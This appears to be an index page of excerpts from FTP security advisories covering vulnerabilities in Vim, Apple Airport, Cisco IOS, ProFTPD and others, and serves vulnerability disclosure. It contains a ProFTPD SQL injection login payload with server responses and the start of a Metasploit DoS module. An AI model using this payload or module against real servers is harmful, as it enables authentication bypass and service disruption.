Next Page >>
FTP server
On 12/08/08 23:59, Jan Minář wrote:
> Vim: Netrw: FTP User Name and Password Disclosure
>
> 1. SUMMARY
>
> Product : Vim -- Vi IMproved
> Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
> Impact : Credentials disclosure
> Wherefrom: Remote
> Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
Vim: Netrw: FTP User Name and Password Disclosure
1. SUMMARY
Product : Vim -- Vi IMproved
Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
Impact : Credentials disclosure
Wherefrom: Remote
Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
XM Easy Personal FTP Server Multiple DoS vulnerabilities
Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10
Date of Discovery: 14-May-2009
Vendor: Dxmsoft
URL: http://www.dxm2008.com/
HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573)
multiple FTP-based vulnerabilities
Class : Remote directory traversal, Remote DoS
Threat level : HIGH
Discovered : 2007-09-06
Published : 2007-08-24
Credit : Gynvael Coldwind
The FTP proxy used in Apple's Airport Express, Airport Extreme, Time Capsule and possibly elsewhere doesn't check the client provided address and port given by the FTP PORT command against the IP address of the connecting client, or against the use of privileged ports. (The FTP PORT command is used by a FTP client to tell an FTP server which address and data port to initiate the data connection on.) The FTP proxy is used to provide assistance to clients operating in NAT environments served by the Apple products. FTP servers running behind a NAT with this assistance can have addresses in the command channel rewritten for them so that external clients can reach them when operating in passive mode. The ALG operates as a proxy server, assuming responsibility for connections to the FTP server, and must therefore also handle and modify rewriting of the PORT command. It looks like it might be ftp-proxy from PF.
The effect of this problem is to allow anybody with access to the FTP port forwarded on the exterior side of an Apple Airport product that offers NAT to internal clients, which for a publicly-accessible FTP server is the big bad world, to induce an FTP server operating behind a NAT to send data to arbitrary addresses and ports. This is true even if the FTP server is configured to operate more securely, since it sees connections from the NAT's exterior interface, not the connecting client. This is useful for bouncing anonymous port scans off the victim NAT, or if data is available or can be written to and then read from the FTP server, potentially for anonymous attacks, spam, news floods, and other such badness. Any trust relationship and/or security implied or assumed by a NAT is also gone, since the PORT command can also specify private addresses, inside the NAT, for victimisation. Best of all, the gateway itself makes no log entry concerning FTP connections that have been run through the proxy.
Workarounds: do not use FTP; do not trigger the use of the ALG (FTP proxy) by explicitly using ports other than 21 on the inbound port mapping. If you can't do those things, you can avoid the worst effects of this attack by disabling FTP uploads that can later be downloaded by anonymous users.
Apple likes to keep secrets for the protection of its customers. Since the reasonable release of this advisory removes that protection, confidential information vouchsafed to me can be safely disclosed with no ill effects. Apple has a fix, and according to its last seemingly automatic template message, they are still testing it and do not know precisely when it will be released. This is confidential information. DO NOT DISCLOSE!
Advisory history:
Microsoft FTP Client Multiple Bufferoverflow
Vulnerability
#####################################################################
XDisclose Advisory : XD100096
Vulnerability Discovered: November 20th 2007
Advisory Reported : November 28th 2007
Credit : Rajesh Sethumadhavan
http://www.security-database.com/toolswatch/AS-400-Auditing-Framework-Beta.html
5) Comments of note:
> ... some default services on AS/400 allow
> annonymous access including POP3, SMTP, LDAP, FTP, etc. But what
> fails audit almost every time are default passwords.
> ... security of these beasts had not been in forefront for
> most companies. Some of them run their e-commerce solutions on AS/400
> facing the Internet
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.8.0 Type DoS',
HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 Total Commander 7.01 Remote FTP Client
Directory Traversal
Class : Remote Directory Traversal
Threat level : HIGH
Discovered : 2007-08-25
Published : 2007-09-06
|------------------------------------------------------------------|
Advisory : CORELAN-10-004
Disclosure date : Jan 12, 2010
Corelan Reference :
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/
0x00 : Vulnerability information
--------------------------------
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/
Web commands injection through FTP Login in Synology Disk Station
CVE-2010-2453
INTRODUCTION
Synology Inc develops high-performance, reliable, versatile, and environmentally-friendly Network Attached Storage (NAS) products. Synology's goal
HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 Magellan Explorer 3.32 build 2305 Remote FTP
Client Directory Traversal
Class : Remote Directory Traversal
Threat level : HIGH
Discovered : 2007-08-14
Published : 2007-09-06
Credits:zhangmc[at]mail.ustc.edu.cn
Vendor: Dxmsoft
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server is a easy use FTP server Application. Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when the "LIST" is sent to FTP server if you do not use "PASV" or "POST" first.
This is Paul Oxman with Cisco PSIRT.
The Cisco published advisory that Andy references is
located at:
http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml
Regards
Name: Paul Oxman
Phone: +65 6317 7418
Credits:
leinakesi[at]gmail.com
Vendor:
Core FTP
Affected:
Core FTP Server 1.0 build 347.
Earlier versions may also be affected.
Title:
======
PSFTP v.1.8 Build 921 - Null Pointer (DoS) Vulnerability
Date:
=====
2012-04-23
Credits:zhangmc[at]mail.ustc.edu.cn
Vendor:
Ari Pikivirta
http://downstairs.dnsalias.net/homeftpserver.html
Affected:
Home FTP Server 1.10.1.139
Earlier versions may also be affected
#####################################################################################
Application: Cerberus FTP 3.0.6
Platforms: Windows XP Professional SP2
Windows Vista SP1
crash: YES
Exploitation: Remote DoS
Advisory: Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.
Version Affected:
Google Chrome: 1.0.154.36
Description:
Google Chrome FTP Client is vulnerable to FTP PASV malicious port
scanning vulnerability. The username in the
FTP (ftp://username:password@domain.com) can be manipulated by tampering
it with certain IP address with
Title: HTC / Android OBEX FTP Service Directory Traversal

Author: Alberto Moreno Tablado

Vendor: HTC

Products:

- HTC devices running Android 2.1

- HTC devices running Android 2.2
References: http://www.seguridadmobile.com/android/android-security/HTC-Android-OBEX-FTP-Service-Directory-Traversal.html
Summary:
HTC devices running Android 2.1 and Android 2.2 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and read arbitrary files, via a ../ in a pathname.
Credits:
leinakesi[at]gmail.com
Vendor:
Core FTP mini-sftp-server
http://www.coreftp.com/server/index.html
Affected:
Core FTP mini-sftp-server version 1.19.
Earlier versions may also be affected.
Hi,
The IOS FTP server vulnerabilities were published in an advisory by
Cisco in May 2007. The FTP server does not run by default, it is not
widely used and has since been removed from new versions of IOS.
Therefore, I took the decision to release this exploit code in order
to show that IOS can be reliably exploited to provide remote level 15
exec shell access. This clearly demonstrates that patching your router
is just as important as patching your servers.
Discovery Date: Nov 14, 2009
Risk: Important
Affected Software:
* Wing FTP Server 3.1.2
Description:
There is a Denial of Service
(DoS) vulnerability that exists in Wing FTP Server 3.1.2. The
Credits:
leinakesi[at]gmail.com
Vendor:
Turbo FTP Server
Affected:
Turbo FTP Server 1.20.745.
Earlier versions may also be affected.
[DCA-0007]
[Software]
- Quick 'n Easy FTP Server
[Vendor Product Description]
- Quick 'n Easy FTP Server Professional is a multi threaded FTP
server for Windows 98/NT/XP and Vista(32 bits) that can be easily
Looks like a very serious issue to me - it works on our ProFTPD
1.3.2rc2 Server (latest stable on gentoo).
220 ProFTPD 1.3.2rc2 Server (Pumpkin) [xx.xx.xx.xx]
USER %') and 1=2 union select
1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell
from ftp #
331 Password required for %')
PASS 1
230 User %') and 1=2 union select
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Netkit FTP Server: Denial of Service
Date: January 29, 2008
Bugs: #199206
ID: 200801-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
IBM AIX ftp domacro Parameter Buffer Overflow Vulnerability
iDefense Security Advisory 10.30.07
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 30, 2007
I. BACKGROUND
The ftp program is a client application for accessing data stored on FTP
servers. This client is responsible for interfacing with users and
Date of Discovery: 16-Nov-2009
Credits:zhangmc[at]mail.ustc.edu.cn
Vendor: Ari Pikivirta
http://downstairs.dnsalias.net/homeftpserver.html
Affected:
Home FTP Server 1.10.1.139
Earlier versions may also be affected
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01446326
Version: 1
HPSBUX02334 SSRT071403 rev.1 - HP-UX Running ftp, Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-05-12
Last Updated: 2008-05-12
Next Page>>
|
